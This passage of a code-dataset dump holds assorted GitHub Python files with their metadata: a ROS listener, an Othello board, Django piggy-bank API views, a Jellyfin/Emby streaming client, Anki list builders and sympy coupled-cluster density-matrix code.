!= 0 and v2[i] != 0):\n cont = cont + 1\n\n if cont >= 2:\n return True\n else:\n return False\n \n\ndef secv(n):\n pstop = 0\n last = 0 \n maxim = 1\n d = 1\n v = citire(n)\n for i in range(0,n-1):\n if(cifre(v[i],v[i+1]) == True):\n pstop = i + 1\n d = d + 1\n if d > maxim:\n maxim = d\n last = pstop\n else:\n d = 1\n for i in range (last - maxim + 1,last + 1):\n print(v[i])\n \n \ndef main():\n n=int(input(\"dati n: \"))\n \n secv(n)\n \n","repo_name":"boldijar/babes-info-romana","sub_path":"Fundamentele programarii/lab2/14-cel putin2 cifre distincte.py","file_name":"14-cel putin2 cifre distincte.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"23151768145","text":"#!/usr/bin/env python\nimport rospy\nimport json\nfrom std_msgs.msg import Float64\n\ndef callback(data):\n delay = rospy.get_time() - data.data\n rospy.loginfo(rospy.get_caller_id() + \" I heard '%s'\", delay)\n\ndef listener():\n # init node\n rospy.init_node('listener', anonymous=True)\n\n rospy.Subscriber(\"timestamptopic\", Float64, callback)\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\nif __name__ == '__main__':\n listener()\n","repo_name":"robertoooo/ROS_AWS_IoT","sub_path":"src/aws_mqtt_bridge/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71434007772","text":"import pandas as pd\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\n\n\nN = 1000\npoi = torch.distributions.Poisson(torch.tensor([3.0]))\nber = torch.distributions.Bernoulli(torch.tensor([0.7]))\n\np = poi.sample((N,))\nb = ber.sample((N,))\n\n\np = p.numpy()\nb = b.numpy()\n\npb = np.multiply(p,b)\n\nplt.hist(p)\nplt.show()\n\nplt.hist(pb)\nplt.show()","repo_name":"kavu16/College-Work","sub_path":"MachineLearning/HW3.2.py","file_name":"HW3.2.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6903008750","text":"import numpy as np\nimport string\nimport pawn_file\nimport utils\n\nWIDTH = 8\nLENGTH = 8\n\nNULL_VALUE = ' '\nvalue_mask = {\n \"O\" : 1,\n \"X\" : -1\n }\n\nTURN = {True : 'O', False : 'X'}\nclass Board(object):\n def __init__(self):\n self.board = np.array([NULL_VALUE] * WIDTH * LENGTH).reshape((LENGTH,WIDTH)).astype(dtype='object')\n self.Pawn_list = []\n self.Next_to_move = True\n self.Move_list = []\n \n def place_pawn(self, Coord_tar_str, couleur):\n ### le if pour savoir si place libre fais avant normalement\n x, y = utils.Convert_str_coord(Coord_tar_str)\n Pawn = pawn_file.pawn(couleur, pos = (x, y))\n self.board[y, x] = Pawn\n self.Pawn_list.append(Pawn)\n self.Next_to_move = not self.Next_to_move\n self.Move_list.append(f'{couleur}-{Coord_tar_str}')\n \n def remove_pawn(self, Coord_tar_str):\n x, y = utils.Convert_str_coord(Coord_tar_str)\n self.board[y, x] = NULL_VALUE\n self.Next_to_move = not self.Next_to_move\n self.Move_list.pop()\n \n def init_table(self):\n self.place_pawn('E4', 'O')\n self.place_pawn('D5', 'O')\n self.place_pawn('D4', 'X')\n self.place_pawn('E5', 'X')\n\n def print_board(self):\n print(self.board.astype(str))\n \n def Get_board_mask(self):\n b = self.board.astype(str)\n tmp = np.zeros(b.shape)\n for i, e in enumerate(np.unique(b)):\n if e!= NULL_VALUE:\n tmp[b==e] = value_mask[e]\n return tmp\n\n def Get_fen(self):\n Fen = ''\n for row in self.board.astype(str):\n offset = 0\n for e in row:\n if e == NULL_VALUE:\n offset+=1\n else:\n if offset!=0:\n Fen+=str(offset)\n offset = 0\n Fen+=e\n if offset!=0:\n Fen+=str(offset)\n Fen+='/'\n Fen += f' {TURN[self.Next_to_move]}'\n return Fen\n ","repo_name":"BenBouiss/Othello","sub_path":"board_file.py","file_name":"board_file.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73048366811","text":"import pathlib\nfrom setuptools import find_packages, setup\n\n# The directory containing this file\nHERE = pathlib.Path(__file__).parent\n\n# The text of the README file\nREADME = (HERE / \"README.md\").read_text()\n\n# This call to setup() does all the work\nsetup(\n name=\"CAImport\",\n version=\"1.0.9\",\n description=\"Coding Around simple tools for python\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/codingaround/CAImport.git\",\n author=\"codingaround\",\n author_email=\"codingaround90s@gmail.com\",\n license=\"GNU\",\n classifiers=[\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.9\",\n ],\n # packages=[\"CAImport\"],\n packages=find_packages(exclude=(\"tests\",)),\n install_requires=['grequests'],\n # entry_points={\n # \"console_scripts\": [\n # \"realpython=instanceTuner.__main__:main\",\n # ]\n # },\n)\n","repo_name":"codingaround/CAImport","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40508161934","text":"class Solution:\n def luckyNumbers (self, matrix: list) -> list:\n m, n = len(matrix), len(matrix[0])\n \n row_min = []\n for i in range(m):\n row_min.append(min(matrix[i]))\n \n col_max = []\n for j in range(n):\n col_max.append(max([row[j] for row in matrix]))\n \n return [element for element in row_min if element in col_max]\n \nif __name__ == '__main__':\n s = Solution()\n matrix = [[3,7,8],[9,11,13],[15,16,17]]\n print(s.luckyNumbers(matrix))","repo_name":"Yonoi/partner","sub_path":"msun/others/1380.py","file_name":"1380.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23297638675","text":"from unicodedata import category\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_auth.views import APIView\nfrom .models import Category, PiggyBank, Transaction, UserSavings\nfrom .serializers import CategorySerializer, PiggyBankSerializer\n# Create your views here.\nfrom rest_framework import status\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.permissions import BasePermission, IsAuthenticated, SAFE_METHODS, AllowAny\nfrom typing import List, Any\n\n\nclass CategoriesView(APIView):\n def get(self, request):\n categories = Category.objects.all()\n data = CategorySerializer(categories, many=True).data\n return Response(data)\n\nclass TransactionView(APIView):\n authentication_classes: List = []\n permission_classes: List[Any] = [AllowAny]\n\n \n def post(self, request):\n try:\n tr = Transaction(\n amount=int(request.POST.get(\"amount\")),\n category=Category.objects.get(pk=int(request.POST.get(\"category\"))),\n user=int(request.POST.get(\"user\"))\n )\n tr.save()\n try:\n usgs = UserSavings.objects.get(user=tr.user)\n pgbk = PiggyBank.objects.filter(user=tr.user, category=tr.category)\n if pgbk:\n pgbk = pgbk[0]\n pgbk.current_amount += pgbk.acummulating_rate * tr.amount\n pgbk.save()\n except:pass\n return Response(status=status.HTTP_200_OK)\n\n except Exception as e:\n return Response(e)\n\n\nclass PiggyBankView(APIView):\n authentication_classes: List = []\n permission_classes: List[Any] = [AllowAny]\n\n def get(self, request):\n pbs = PiggyBank.objects.filter(user=int(self.request.query_params.get('user')))\n data = PiggyBankSerializer(pbs, many=True).data\n data = {\n \"piggy_banks\": data,\n \"user_bank\": UserSavings.objects.get(user=int(self.request.query_params.get('user'))).amount\n }\n return Response(data)\n\n def post(self, request):\n CATEGORIES = {\n 'ENTERTAINMENT': 6,\n 'TRANSPORTATION': 5,\n 'CLOTHES': 4,\n 'GROCERIES': 2,\n 'FOOD': 1,\n }\n # print(request.POST)\n # print(\"asdf\")\n print(request.data)\n # print(request.data[\"limit\"])\n try:\n pb = PiggyBank(\n limit=int(request.data['budgetLimit']),\n category=Category.objects.get(pk=CATEGORIES[request.data['type']]),\n acummulating_rate=float(request.data[\"rate\"]),\n user=1,\n name=request.data['name'],\n )\n pb.save()\n return Response(status=status.HTTP_200_OK)\n except Exception as e:\n return Response(e)\n\n","repo_name":"iberdiev/peggy_wise","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9780092779","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# 1. What does an empty dictionary's code look like?\n\n# In[1]:\n\n\ndict = {}\ntype(dict)\n \n\n\n# 2. What is the value of a dictionary value with the key 'foo' and the value 42?\n\n# In[2]:\n\n\n{'foo':42}\n\n\n# 3.What is the most significant distinction between a dictionary and a list?\n# \n# \n# List - items in list are Ordered\n# Dictionary : iten in dictionary are unordered\n\n# 5.If a dictionary is stored in spam, what is the difference between the expressions 'cat' in spam and 'cat' in spam.keys()?\n\n# In[4]:\n\n\nspam ={'cat':100}\n'cat' in spam\n \n\n\n# In[5]:\n\n\n'cat' in spam.keys()\n\n\n# In[6]:\n\n\nspam ={'cat':100}\n'cat' in spam.values()\n\n\n# 7.What is a shortcut for the following code?\n# \n\n# In[9]:\n\n\nspam ={'cat':100}\nspam.setdefault('Doll','pink')\nspam\n\n\n# 8.How do you 'pretty print' dictionary values using which module and function?\n\n# In[10]:\n\n\nimport pprint\ndct = [ {'Name': 'Shruti', 'Age': '20', 'Country': 'India'},\n {'Name': 'Ashia', 'Age': '26', 'Country': 'China'},\n {'Name': 'Joe', 'Age': '29', 'Country': 'UK'},\n {'Name': 'Chumlee', 'Age': '35', 'Country': 'USA'}\n]\n\n\n# In[11]:\n\n\npprint.pprint(dct)\n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"shrutilalwani07/Ineuron-Assignments","sub_path":"Assignment_5.py","file_name":"Assignment_5.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5164507565","text":"from .mediaserver_information import check_information\nfrom .playback_reporting import *\n\n# Some mildly important variables #\nglobal version\nversion = \"0.3.dev9\"\nappname = \"Puddler\"\n\n\ndef green_print(text):\n print(\"\\033[92m{}\\033[00m\".format(text))\n\n\ndef blue_print(text):\n print(\"\\033[96m{}\\033[00m\".format(text))\n\n\ndef red_print(text):\n print(\"\\033[91m{}\\033[00m\".format(text))\n\n\ndef close_session():\n if use_rpc:\n rpc.close()\n exit()\n\n\ndef choosing_media(head_dict):\n def json_alone(items):\n count = 0\n for x in items:\n count = count + 1\n if count != 1:\n return False\n else:\n return True\n\n def print_json(items, count=False, add_to=None):\n if not add_to:\n item_list = []\n else:\n # For smol brains\n item_list = add_to\n for x in items[\"Items\"]:\n if x[\"Name\"] not in item_list:\n item_list.append(x)\n if not x[\"UserData\"][\"Played\"]:\n if \"PlayedPercentage\" in x[\"UserData\"]:\n percentage = \"{}%\".format(int(x.get(\"UserData\").get(\"PlayedPercentage\")))\n if not count:\n print(\n \" [{}] {} - ({}) {}\".format(\n item_list.index(x), x.get(\"Name\"), x.get(\"Type\"), percentage))\n else:\n blue_print(\" [{}] {} - ({})\".format(\"Enter\", x.get(\"Name\"), x.get(\"Type\")))\n try:\n input()\n except KeyboardInterrupt:\n close_session()\n else:\n if not count:\n print(\n \" [{}] {} - ({})\".format(item_list.index(x), x.get(\"Name\"), x.get(\"Type\")))\n else:\n blue_print(\" [{}] {} - ({})\".format(\"Enter\", x.get(\"Name\"), x.get(\"Type\")))\n try:\n input()\n except KeyboardInterrupt:\n close_session()\n else:\n if not count:\n print(\n \" [{}] {} - ({})\".format(item_list.index(x), x.get(\"Name\"), x.get(\"Type\")), end=\"\")\n green_print(\" [PLAYED]\")\n else:\n blue_print(\" [{}] {} - ({}) [PLAYED]\".format(\"Enter\", x.get(\"Name\"), x.get(\"Type\")))\n try:\n input()\n except KeyboardInterrupt:\n close_session()\n return item_list\n\n def process_input(already_asked, item_list):\n if len(item_list) > 1:\n if not already_asked:\n try:\n raw_pick = input(\": \")\n except KeyboardInterrupt:\n close_session()\n else:\n raw_pick = search\n pick = int(re.sub(\"[^0-9]\", \"\", raw_pick))\n if pick < (len(item_list) + 1) and not pick < 0:\n print(\"\\nYou've chosen \", end=\"\")\n blue_print(item_list[pick].get(\"Name\"))\n else:\n print(\"Are you stupid?!\")\n exit()\n return pick\n elif len(item_list) == 1:\n pick = 0\n return pick\n else:\n print(\"Nothing found.\\n\")\n item_list = choosing_media(head_dict)\n streaming(head_dict, item_list)\n\n ipaddress = head_dict.get(\"config_file\").get(\"ipaddress\")\n media_server = head_dict.get(\"media_server\")\n user_id = head_dict.get(\"config_file\").get(\"app_auth\").get(\"user_id\")\n request_header = head_dict.get(\"request_header\")\n nextup = requests.get(\n \"{}{}/Users/{}/Items/Resume\"\n .format(ipaddress, media_server, user_id), headers=request_header)\n if \"Id\" in nextup.text:\n print(\"\\nContinue Watching:\")\n item_list = print_json(nextup.json())\n next_up = True\n else:\n next_up = False\n latest = requests.get(\"{}{}/Users/{}/Items/Latest\"\n .format(ipaddress, media_server, user_id), headers=request_header)\n latest = {\n \"Items\": latest.json()\n }\n print(\"\\nLatest:\")\n if next_up:\n item_list = print_json(latest, add_to=item_list)\n else:\n item_list = print_json(latest)\n try:\n search = input(\n \"Please choose from above, enter a search term, or type \\\"ALL\\\" to \"\n \"display literally everything.\\n: \")\n except KeyboardInterrupt:\n close_session()\n if search != \"ALL\" and not re.search(\"^[0-9]+$\", search):\n items = requests.get(\"{}{}/Items?SearchTerm={}&UserId={}&Recursive=true&IncludeItemTypes=Series,Movie\"\n .format(ipaddress, media_server, search, user_id), headers=request_header)\n if json_alone(items.json()[\"Items\"]):\n print(\"\\nOnly one item has been found.\\nDo you want to select this title?\")\n item_list = print_json(items.json(), True)\n else:\n print(\"Please choose from the following results: \")\n item_list = print_json(items.json())\n pick = process_input(False, item_list)\n elif search == \"ALL\":\n items = requests.get(\"{}{}/Items?SearchTerm=&UserId={}&Recursive=true&IncludeItemTypes=Series,Movie\"\n .format(ipaddress, media_server, user_id), headers=request_header)\n if json_alone(items.json()[\"Items\"]):\n print(\"\\nOnly one item has been found.\\nDo you want to select this title?\")\n item_list = print_json(items.json(), True)\n else:\n print(\"Please choose from the following results: \")\n item_list = print_json(items.json())\n pick = process_input(False, item_list)\n else:\n pick = process_input(True, item_list)\n return item_list[pick]\n\n\ndef streaming(head_dict, item_list):\n from .playing import run_mpv\n\n def playlist(starting_pos):\n stream_url = (\"{}{}/Videos/{}/stream?Container=mkv&Static=true&SubtitleMethod=External&api_key={}\".format(\n ipaddress, media_server, episode_list[starting_pos].get(\"Id\"),\n request_header.get(\"X-Emby-Token\")))\n run_mpv(stream_url, episode_list[starting_pos], head_dict, appname)\n next_ep = True\n while next_ep:\n starting_pos = starting_pos + 1\n if starting_pos == len(episode_list):\n return\n try:\n green_print(\"\\nWelcome back. Do you want to continue playback with:\")\n blue_print(\" {} - {} - {}\"\n .format(episode_list[starting_pos].get(\"SeriesName\"),\n episode_list[starting_pos].get(\"SeasonName\"),\n episode_list[starting_pos].get(\"Name\")))\n print(\" (Y)es | (N)o | (E)xit\\n: \", end=\"\")\n what = get_keypress(\"YyNnEe\")\n if what in \"Yy\":\n next_ep = True\n elif what in \"Nn\":\n next_ep = False\n return\n elif what in \"Ee\":\n close_session()\n except KeyboardInterrupt:\n close_session()\n print(\"Starting playback of:\")\n blue_print(\" {}\".format(episode_list[starting_pos].get(\"Name\")))\n stream_url = (\n \"{}{}/Videos/{}/stream?Container=mkv&Static=true&SubtitleMethod=External&api_key={}\".format(\n ipaddress, media_server, episode_list[starting_pos].get(\"Id\"),\n request_header.get(\"X-Emby-Token\")))\n run_mpv(stream_url, episode_list[starting_pos], head_dict, appname)\n\n ipaddress = head_dict.get(\"config_file\").get(\"ipaddress\")\n media_server = head_dict.get(\"media_server\")\n media_server_name = head_dict.get(\"media_server_name\")\n user_id = head_dict.get(\"config_file\").get(\"app_auth\").get(\"user_id\")\n request_header = head_dict.get(\"request_header\")\n if item_list.get(\"Type\") in \"Movie\":\n print(\"Starting mpv...\".format(item_list.get(\"Name\")))\n stream_url = (\"{}{}/Videos/{}/stream?Container=mkv&Static=true&SubtitleMethod=External&api_key={}\".format(\n ipaddress, media_server, item_list.get(\"Id\"), request_header.get(\"X-Emby-Token\")))\n run_mpv(stream_url, item_list, head_dict, appname)\n elif item_list.get(\"Type\") == \"Series\":\n print(\"{}:\".format(item_list.get(\"Name\")))\n series = requests.get(\"{}{}/Users/{}/Items?ParentId={}\".format(\n ipaddress, media_server, user_id, item_list.get(\"Id\")), headers=request_header).json()\n season_list = []\n for x in series[\"Items\"]:\n season_list.append(x)\n episode_list = []\n for y in season_list:\n print(\" {}\".format(y.get(\"Name\")))\n episodes = requests.get(\"{}{}/Users/{}/Items?ParentId={}\".format(\n ipaddress, media_server, user_id, y.get(\"Id\")), headers=request_header).json()\n for z in episodes[\"Items\"]:\n if z in episode_list:\n if z.get(\"SeasonName\") != \"Specials\":\n continue\n z[\"fuck\"] = \"me\"\n episode_list.append(z)\n else:\n episode_list.append(z)\n if z.get(\"UserData\").get(\"Played\") == 0:\n print(\" [{}] {}\".format(episode_list.index(z), z.get(\"Name\")))\n else:\n print(\" [{}] {}\".format(episode_list.index(z), z.get(\"Name\")), end=\"\")\n green_print(\" [PLAYED]\")\n try:\n starting_pos = input(\"Please enter which episode you want to continue at (number)\\n: \")\n except KeyboardInterrupt:\n close_session()\n starting_pos = int(re.sub(\"[^0-9]\", \"\", starting_pos))\n if starting_pos < (len(episode_list) + 1) and not starting_pos < 0:\n print(\"\\nYou've chosen \", end=\"\")\n blue_print(episode_list[starting_pos].get(\"Name\"))\n else:\n print(\"Are you stupid?!\")\n exit()\n playlist(starting_pos)\n elif item_list.get(\"Type\") in \"Episode Special\":\n series = requests.get(\"{}{}/Users/{}/Items?ParentId={}\".format(\n ipaddress, media_server, user_id, item_list.get(\"SeriesId\")), headers=request_header).json()\n season_list = []\n for x in series[\"Items\"]:\n season_list.append(x)\n episode_list = []\n for y in season_list:\n episodes = requests.get(\"{}{}/Users/{}/Items?ParentId={}\".format(\n ipaddress, media_server, user_id, y.get(\"Id\")), headers=request_header).json()\n for z in episodes[\"Items\"]:\n if z in episode_list:\n if z.get(\"SeasonName\") != \"Specials\":\n continue\n z[\"fuck\"] = \"me\"\n episode_list.append(z)\n else:\n episode_list.append(z)\n starting_pos = episode_list.index(item_list)\n playlist(starting_pos)\n else:\n print(\"The object type you've chosen is invalid.\\nPlease report this on github.\")\n green_print(\"All playback has finished.\\nPress [Enter] to search for something else.\")\n try:\n input()\n except KeyboardInterrupt:\n close_session()\n item_list = choosing_media(head_dict)\n streaming(head_dict, item_list)\n\n\ndef main():\n head_dict = check_information(appname, version)\n item_list = choosing_media(head_dict)\n streaming(head_dict, item_list)\n\n\nmain()\n","repo_name":"Vernoxvernax/Puddler","sub_path":"puddler/puddler.py","file_name":"puddler.py","file_ext":"py","file_size_in_byte":11887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12932197300","text":"import dash_bootstrap_components as dbc\nfrom dash import dcc, html\n\nfrom constants.enums import OptimizationState\n\n\ndef labelled_dropdown(\n label: str,\n input_id: str,\n options: list,\n value: str,\n disabled: bool = False,\n store_id: str = None,\n) -> dbc.Container:\n return dbc.Container(\n [\n dbc.Label(label),\n dcc.Dropdown(\n id=input_id,\n options=options,\n value=value,\n searchable=True,\n clearable=False,\n disabled=disabled,\n ),\n dcc.Store(id=store_id) if store_id else None,\n ],\n fluid=True,\n style={\"marginLeft\": \"-1vh\", \"width\": \"105%\"},\n )\n\n\ndef labelled_input(\n label: str,\n input_id: str,\n initial_value: int,\n placeholder: str = None,\n input_type: str = \"number\",\n) -> dbc.FormFloating:\n return dbc.FormFloating(\n [\n dbc.Input(\n id=input_id,\n type=input_type,\n value=initial_value,\n placeholder=placeholder,\n ),\n dbc.Label(label),\n ]\n )\n\n\ndef horizontal_line():\n return html.Hr(\n style={\"borderTop\": \"0.1vh solid #888\", \"width\": \"90%\", \"margin\": \"4vh auto\"}\n )\n\n\ndef labelled_input_group(\n symbol: list,\n description: str,\n input_id: str,\n initial_value: str,\n unit: str = None,\n type: str = \"number\",\n disabled=False,\n) -> dbc.InputGroup:\n return dbc.InputGroup(\n [\n dbc.InputGroupText(symbol),\n dbc.FormFloating(\n [\n dbc.Input(\n id=input_id,\n type=type,\n value=initial_value,\n disabled=disabled,\n ),\n dbc.Label(description),\n ]\n ),\n dbc.InputGroupText(unit) if unit else None,\n ],\n className=\"mb-3\",\n )\n\n\ndef labelled_select_group(\n description: str,\n input_id: str,\n options: list,\n value: str,\n disabled=False,\n):\n return dbc.InputGroup(\n [\n dbc.InputGroupText(description),\n dbc.Select(\n id=input_id,\n options=options,\n value=value,\n disabled=disabled,\n ),\n ],\n className=\"mb-3\",\n )\n\n\ndef labelled_optimizable_number_input(\n title: str,\n radio_id: str,\n radio_value: OptimizationState,\n fix_collapse_id: str,\n fix_input_id: str,\n fix_input_value: float,\n constrain_collapse_id: str,\n constrain_min_id: str,\n constrain_min_value: float,\n constrain_max_id: str,\n constrain_max_value: float,\n) -> dbc.Container:\n return dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(dbc.Label(title), width=2),\n dbc.Col(\n optimization_radio(radio_id, radio_value),\n width=6,\n ),\n dbc.Col(\n [\n collapse_input(\n fix_input_id, fix_input_value, fix_collapse_id\n ),\n collapse_double_input(\n constrain_collapse_id,\n constrain_min_id,\n constrain_min_value,\n constrain_max_id,\n constrain_max_value,\n ),\n ],\n width=3,\n ),\n ],\n justify=\"around\",\n align=\"center\",\n ),\n ],\n fluid=True,\n )\n\n\ndef optimization_radio(idx: str, state: OptimizationState) -> html.Div:\n return html.Div(\n dbc.RadioItems(\n id=idx,\n className=\"btn-group\",\n inputClassName=\"btn-check\",\n labelClassName=\"btn btn-outline-primary\",\n labelCheckedClassName=\"active\",\n options=[\n {\"label\": state.name, \"value\": state.value}\n for state in OptimizationState\n ],\n value=state.value,\n ),\n className=\"radio-group\",\n )\n\n\ndef collapse_input(input_id: str, input_value: float, collapse_id: str) -> dbc.Collapse:\n return dbc.Collapse(\n dbc.Input(\n id=input_id,\n type=\"number\",\n value=input_value,\n ),\n collapse_id,\n )\n\n\ndef collapse_double_input(\n collapse_id: str,\n input1_id: str,\n input1_value: float,\n input2_id: str,\n input2_value: float,\n) -> dbc.Collapse:\n return dbc.Collapse(\n [\n dbc.Row(\n [\n dbc.Col(\n dbc.Input(\n id=input1_id,\n type=\"number\",\n value=input1_value,\n placeholder=\"Minimum\",\n ),\n width=6,\n ),\n dbc.Col(\n dbc.Input(\n id=input2_id,\n type=\"number\",\n value=input2_value,\n placeholder=\"Maximum\",\n step=\"any\",\n ),\n width=6,\n ),\n ]\n ),\n ],\n collapse_id,\n )\n","repo_name":"TimWalter/solar-power-estimator","sub_path":"src/dashboard/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22822200009","text":"# def make_pure_word_list(word_set):\n# cigencizhui_root = Cigencizhui_Root()\n# with open('pure_word_list.txt', 'w', encoding='utf-8') as f:\n# ordered_input_word_list = cigencizhui_root.put_word_list_in_order(word_set)\n# for word in ordered_input_word_list:\n# print(word)\n# f.write(word)\n# f.write('\\n')\n\n\ndef make_anki_word_image_list(word_set):\n with open('./output/anki_word_image_list.txt', 'w', encoding='utf-8') as f:\n final_word_list = word_set\n print('ordered_input_word_list: ', len(final_word_list))\n for word in final_word_list:\n word = word.strip()\n line = word\n for i in range(1, 11):\n line += \"\\\\\".format(\"word_\" + word + str(i))\n f.write(line)\n f.write('\\n')\n\n\ndef make_gre_synonym_image_list(word_set):\n with open(word_set, 'r', encoding='utf-8') as f:\n word_list = f.read().splitlines()\n\n with open('./output/GRE_anki_same.txt', 'w', encoding='utf-8') as f:\n for word in word_list:\n word = word.strip()\n if len(word) == 0:\n continue\n print(word)\n if '\\u4e00' <= word[0] <= '\\u9fff':\n now_class = word\n else:\n line = word\n for i in range(1, 11):\n line += \"\\\\\".format(word + str(i))\n line += \"\\\\\" + now_class\n f.write(line)\n f.write('\\n')\n\n\ndef make_anki_delete_list(word_set):\n with open('./output/anki_delete_list.txt', 'w', encoding='utf-8') as f:\n for word in word_set:\n word = word.strip()\n line = word\n line += '\\\\_____'\n f.write(line)\n f.write('\\n')\n\n\nif __name__ == '__main__':\n input_txt = \"./word_list_txt/TOEFL_红宝书.txt\"\n\n word_set = set()\n with open(input_txt, 'r', encoding='utf-8') as f:\n for line in f:\n word = line.strip()\n word_set.add(word)\n\n make_anki_word_image_list(word_set)\n","repo_name":"Ryanshuai/Make_Anki_List","sub_path":"06_make_anki_list.py","file_name":"06_make_anki_list.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15344836776","text":"import collections\nimport math\n\nfrom sympy.physics.secondquant import F, Fd, Commutator, evaluate_deltas\nfrom sympy import symbols, Dummy, Rational\n\nfrom helper_functions import eval_equation, beautify_equation\nfrom cluster_operators import (\n get_t_1_operator,\n get_t_2_operator,\n get_l_1_operator,\n get_l_2_operator,\n get_clusters,\n)\n\nsymbol_list = [\n (\"rho^{b}_{a} = \", symbols(\"a, b\", above_fermi=True, cls=Dummy)),\n (\n \"rho^{i}_{a} = \",\n (\n symbols(\"a\", above_fermi=True, cls=Dummy),\n symbols(\"i\", below_fermi=True, cls=Dummy),\n ),\n ),\n (\n \"rho^{a}_{i} = \",\n (\n symbols(\"i\", below_fermi=True, cls=Dummy),\n symbols(\"a\", above_fermi=True, cls=Dummy),\n ),\n ),\n (\"rho^{j}_{i} = \", symbols(\"i, j\", below_fermi=True, cls=Dummy)),\n]\n\n\ndef get_one_body_density_operator(p, q):\n return Fd(p) * F(q)\n\n\ndef get_one_body_density_matrix(\n cc_t_functions, cc_l_functions, num_commutators, p=None, q=None\n):\n if p is None:\n p = symbols(\"p\", cls=Dummy)\n\n if q is None:\n q = symbols(\"q\", cls=Dummy)\n\n c_pq = get_one_body_density_operator(p, q)\n\n if not isinstance(cc_t_functions, collections.Iterable):\n cc_t_functions = [cc_t_functions]\n\n if not isinstance(cc_l_functions, collections.Iterable):\n cc_l_functions = [cc_l_functions]\n\n T = get_clusters(cc_t_functions)\n L = get_clusters(cc_l_functions)\n\n rho_eq = eval_equation(c_pq)\n rho_eq += eval_equation(Commutator(c_pq, T))\n rho_eq += eval_equation(L * c_pq)\n\n comm = c_pq\n\n for i in range(1, num_commutators + 1):\n comm = Commutator(comm, get_clusters(cc_t_functions))\n rho_eq += Rational(1, int(math.factorial(i))) * eval_equation(L * comm)\n\n rho = beautify_equation(rho_eq)\n\n return rho\n\n\ndef get_ccs_one_body_density_matrix(p=None, q=None):\n return get_one_body_density_matrix(\n get_t_1_operator, get_l_1_operator, 1, p=p, q=q\n )\n\n\ndef get_ccd_one_body_density_matrix(p=None, q=None):\n rho = get_one_body_density_matrix(\n get_t_2_operator, get_l_2_operator, 1, p=p, q=q\n )\n\n return rho\n\n\ndef get_ccsd_one_body_density_matrix(p=None, q=None):\n rho = get_one_body_density_matrix(\n [get_t_1_operator, get_t_2_operator],\n [get_l_1_operator, get_l_2_operator],\n 2,\n p=p,\n q=q,\n )\n\n return rho\n\n\nif __name__ == \"__main__\":\n from sympy import latex\n\n p = symbols(\"p\", above_fermi=True, cls=Dummy)\n q = symbols(\"q\", above_fermi=True, cls=Dummy)\n p = q = None\n\n print(\"CCS:\", latex(get_ccs_one_body_density_matrix(p=p, q=q)))\n print(\"CCD:\", latex(get_ccd_one_body_density_matrix(p=p, q=q)))\n print(\"CCSD:\", latex(get_ccsd_one_body_density_matrix(p=p, q=q)))\n","repo_name":"HyQD/coupled-cluster","sub_path":"symbolic-expressions/one_body_density_matrix.py","file_name":"one_body_density_matrix.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"25637548810","text":"class Solution(object):\n def onesMinusZeros(self, grid):\n trans = list(list(x) for x in zip(*grid))\n row = []\n col = []\n for i in grid:\n s = sum(i)\n s -= len(grid[0]) - s\n row.append(s)\n for j in trans:\n s = sum(j)\n s -= len(trans[0]) - s\n col.append(s)\n print(row,col)\n ans = [[0 for _ in range(len(grid[0]))] for _ in range(len(grid)) ]\n for i in range(len(row)):\n for j in range(len(col)):\n ans[i][j] = row[i] + col[j]\n \n return ans\n \n \n ","repo_name":"natiyeshi/A2SVproblems","sub_path":"2482-difference-between-ones-and-zeros-in-row-and-column/2482-difference-between-ones-and-zeros-in-row-and-column.py","file_name":"2482-difference-between-ones-and-zeros-in-row-and-column.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33929686229","text":"from typing import List\n\n\nclass Solution:\n def transfor(self, string: str) -> str:\n str_list = string.split(\" \")\n num_str = list()\n operator_str = list()\n for i in str_list:\n if i.isdigit() or i[0] == '-':\n num_str.append(i)\n else:\n operator_str.append(i)\n\n print(num_str)\n print(operator_str)\n\n length = len(operator_str)\n if length == 1:\n s = \" \" + operator_str[0] + \" \"\n return s.join(sorted(num_str))\n\n t = operator_str[0]\n pos = 0\n ret = \"\"\n for i in range(1, 